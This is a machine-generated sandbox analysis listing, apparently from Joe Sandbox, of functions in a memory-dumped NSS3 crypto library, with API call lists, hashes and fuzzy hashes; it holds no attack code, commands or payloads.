Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 23c0decffbf83eed311756eeb42ce23381769d0386a038ca81c76fdbf2561c53
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: 8B41BDB5600602AFE700DF15DA54B92BBA5FF55358F158228D8188BFA0EB72F834CF90

Function 6C79DDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C79DDEC

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

PK11_DigestBegin.NSS3(00000000), ref: 6C79DE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6C79DE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6C79DE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6C79DEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C79DEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C79DECC

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: efae680237356d10744c8fe7cdeefe030862046a2344b4b0a42b2abaf28745e4
Instruction ID: b5caf20846566ec59c45d8fcf132318e7481edcabe61f9286d3e2e44f46c1d9c
Opcode Fuzzy Hash: efae680237356d10744c8fe7cdeefe030862046a2344b4b0a42b2abaf28745e4
Instruction Fuzzy Hash: 0B31C9B29002146BDB10AF79BE49BBB76B89F64708F050135ED09A7742F731D914C6E6

Function 6C777E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C777E48

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6C777E5B

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C777E7B

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C89925C,?), ref: 6C777E92

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C777EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C777ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6C777EFA

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: 2ada82b47b89b6d1a6298a451ca8789cd2d97f5eae06c04309cfc243698ec206
Instruction ID: ebbfbfffa872ad5ab5de23b7b2fa3f736224397479340a437e2143df8461c19b
Opcode Fuzzy Hash: 2ada82b47b89b6d1a6298a451ca8789cd2d97f5eae06c04309cfc243698ec206
Instruction Fuzzy Hash: 85318FB2A002199BEF218A699E44B6B77A8EF44258F164834DC19EBB01E760FC04C7B1

Function 6C7CDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6C7CD9E4,00000000), ref: 6C7CDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6C7CD9E4,00000000), ref: 6C7CDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6C7CD9E4,00000000), ref: 6C7CDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C7CDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C7CDCAD

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: d72a7b5156e257e653943ae758e52e0f3149a2b106d462a366a282ff0b6f62e2
Instruction ID: 4fb4d898a5f6850a7e2d68b8c2007d00baa9bd89c97fddf22109336b545c8212
Opcode Fuzzy Hash: d72a7b5156e257e653943ae758e52e0f3149a2b106d462a366a282ff0b6f62e2
Instruction Fuzzy Hash: 09319EB5A402029FD720CF5DD984B96B7F8AF25358F148439E948CBB01E771E944CBA6

Function 6C792E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C78E728,?,00000038,?,?,00000000), ref: 6C792E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C792E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C792E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6C792E8F
PL_HashTableLookup.NSS3(?,?), ref: 6C792E9E
PR_Unlock.NSS3(?), ref: 6C792EAB
PR_Unlock.NSS3(?), ref: 6C792F0D

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 740dc5fd66bc9a327244c286cf04eff12cb16ca2d8fad6196806f970791ac274
Instruction ID: 2e499803ba7e1f9422d58e2d95a73182a3db05ad09f1e7a5be23b047907b6d09
Opcode Fuzzy Hash: 740dc5fd66bc9a327244c286cf04eff12cb16ca2d8fad6196806f970791ac274
Instruction Fuzzy Hash: 97310579A00105ABEB11AF28ED8887AB779FF1525CB048174ED08C7B12EB31ED64C7E0

Function 6C7B1EA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,S&{l,6C796295,?,00000000,?,00000001,S&{l,?), ref: 6C7B1ECB

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

TlsGetValue.KERNEL32(?,00000001,?,S&{l,6C796295,?,00000000,?,00000001,S&{l,?), ref: 6C7B1EF1
EnterCriticalSection.KERNEL32(?), ref: 6C7B1F01
PR_SetError.NSS3(00000000,00000000), ref: 6C7B1F39

Part of subcall function 6C7BFE20: TlsGetValue.KERNEL32(6C795ADC,?,00000000,00000001,?,?,00000000,?,6C78BA55,?,?), ref: 6C7BFE4B
Part of subcall function 6C7BFE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C7BFE5F

PR_Unlock.NSS3(?), ref: 6C7B1F67

Strings

S&{l, xrefs: 6C7B1EA0

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID: S&{l
API String ID: 704537481-1291044940
Opcode ID: 496461ec077e303e393d47c88e7779642ddb820422bac0e1898f7c2ef7aca821
Instruction ID: e2e1f83f9f17627d7c25c239a005887d558d1ad8cde84fc2a0f74bf3eba70fb6
Opcode Fuzzy Hash: 496461ec077e303e393d47c88e7779642ddb820422bac0e1898f7c2ef7aca821
Instruction Fuzzy Hash: DF21E475A05205AFEB10AF29ED48E9A37A9AF41369F184534FD08E7B12E730E954C7E0

Function 6C7DCEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6C7DCD93,?), ref: 6C7DCEEE

Part of subcall function 6C7D14C0: TlsGetValue.KERNEL32 ref: 6C7D14E0
Part of subcall function 6C7D14C0: EnterCriticalSection.KERNEL32 ref: 6C7D14F5
Part of subcall function 6C7D14C0: PR_Unlock.NSS3 ref: 6C7D150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C7DCD93,?), ref: 6C7DCEFC

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C7DCD93,?), ref: 6C7DCF0B

Part of subcall function 6C7D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C7D08B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C7DCD93,?), ref: 6C7DCF1D

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF47
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF67
SECITEM_CopyItem_Util.NSS3(?,00000000,6C7DCD93,?,?,?,?,?,?,?,?,?,?,?,6C7DCD93,?), ref: 6C7DCF78

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
String ID:
API String ID: 4291907967-0
Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction ID: 23b06cac301ea6622304fdb487724930ff259abdcd1d6d36b82333cd1203ff25
Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
Instruction Fuzzy Hash: 3311BBB6F002055BE7006EB67E49BABB6EC9F5455EF054039EC09D7741FB60E908C6B2

Function 6C788C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C788C1B
EnterCriticalSection.KERNEL32 ref: 6C788C34
PL_ArenaAllocate.NSS3 ref: 6C788C65
PR_Unlock.NSS3 ref: 6C788C9C
PR_Unlock.NSS3 ref: 6C788CB6

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

Strings

KRAM, xrefs: 6C788C8F

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: b0012d1370203f31cb28ae6fafcd37da2357e9389affb33c410e3dd991e73925
Instruction ID: 547ec394d24962ed5b105f2fa450ea0697163e601ddea7ecd06b024d54738e29
Opcode Fuzzy Hash: b0012d1370203f31cb28ae6fafcd37da2357e9389affb33c410e3dd991e73925
Instruction Fuzzy Hash: 792180B1A066018FD700AF79C588559BBF4FF05318F0589BED988CB701DB31D885CB81

Function 6C798E80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EA2

Part of subcall function 6C7BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C7BF854
Part of subcall function 6C7BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C7BF868
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C7BF882
Part of subcall function 6C7BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C7BF889
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C7BF8A4
Part of subcall function 6C7BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C7BF8AB
Part of subcall function 6C7BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C7BF8C9
Part of subcall function 6C7BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C7BF8D0

PK11_IsLoggedIn.NSS3(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EC3
TlsGetValue.KERNEL32(?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?,?,6C784F1C), ref: 6C798EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6C7B2E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6C798EF1
PR_Unlock.NSS3 ref: 6C798F20

Strings

b.{l, xrefs: 6C798E96, 6C798F25

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID: b.{l
API String ID: 1978757487-175572528
Opcode ID: 4f8b7d294c9b0e4c5ada59cff99fd70c58aaf66ace5c1cdf4c325d623131b7e0
Instruction ID: 8302d60c6188c817c9d6b4ce8d24bdaaa225a8724e1a7c3c6bf5d42597db3298
Opcode Fuzzy Hash: 4f8b7d294c9b0e4c5ada59cff99fd70c58aaf66ace5c1cdf4c325d623131b7e0
Instruction Fuzzy Hash: 0D218B74A096059FDB00AF39E688699BBF4FF48318F05456EEC989BB41D730E854CBC2

Function 6C803E20 Relevance: 10.6, APIs: 7, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 6C805B40: PR_GetIdentitiesLayer.NSS3 ref: 6C805B56

PR_EnterMonitor.NSS3(?), ref: 6C803E45

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

PR_EnterMonitor.NSS3(?), ref: 6C803E5C
PR_EnterMonitor.NSS3(?), ref: 6C803E73
PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C803EA6

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_ExitMonitor.NSS3(?), ref: 6C803EC0
PR_ExitMonitor.NSS3(?), ref: 6C803ED7
PR_ExitMonitor.NSS3(?), ref: 6C803EEE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterValue$Exit$CriticalSection$ErrorIdentitiesLayerLeave
String ID:
API String ID: 2517541793-0
Opcode ID: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction ID: 80bbcd3f53ed68a3e10370852ed26a920efdc818268ff055488724d16175f396
Opcode Fuzzy Hash: 54027f88e9f8c7aef8774f630c25a29e5d64c5ae93700a839b1c12e084a23d9d
Instruction Fuzzy Hash: 6C11A571610610AFDB319A6DFE42FC7B7A19B41308F001D34E65D86E20E636ED29C792

Function 6C882C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C882CA0
PR_ExitMonitor.NSS3 ref: 6C882CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C882CD1
strdup.MOZGLUE(?), ref: 6C882CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C882D27

Strings

Loaded library %s (static lib), xrefs: 6C882D22

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 8262382ac812e2c48fe9fb8cbf5874b3a1fe76d645b1f59d23d6168eb620cbd4
Instruction ID: d93799ae56fafeeebc771295f26747c40a0f93a597644509fc4fd2bda2b35b0b
Opcode Fuzzy Hash: 8262382ac812e2c48fe9fb8cbf5874b3a1fe76d645b1f59d23d6168eb620cbd4
Instruction Fuzzy Hash: A51190B16022149FEB309F19EA48A6677B5AB4531DF14893DE80987F42E735ED08CBE1

Function 6C77BDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C77BDCA

Part of subcall function 6C7D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7787ED,00000800,6C76EF74,00000000), ref: 6C7D1000
Part of subcall function 6C7D0FF0: PR_NewLock.NSS3(?,00000800,6C76EF74,00000000), ref: 6C7D1016
Part of subcall function 6C7D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C7787ED,00000008,?,00000800,6C76EF74,00000000), ref: 6C7D102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C77BDDB

Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D10F3
Part of subcall function 6C7D10C0: EnterCriticalSection.KERNEL32(?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D110C
Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1141
Part of subcall function 6C7D10C0: PR_Unlock.NSS3(?,?,?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D1182
Part of subcall function 6C7D10C0: TlsGetValue.KERNEL32(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C77BDEC

Part of subcall function 6C7D10C0: PL_ArenaAllocate.NSS3(?,6C778802,00000000,00000008,?,6C76EF74,00000000), ref: 6C7D116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C77BE03

Part of subcall function 6C7CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C7C8D2D,?,00000000,?), ref: 6C7CFB85
Part of subcall function 6C7CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C7CFBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77BE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C77BE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C77BE3B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
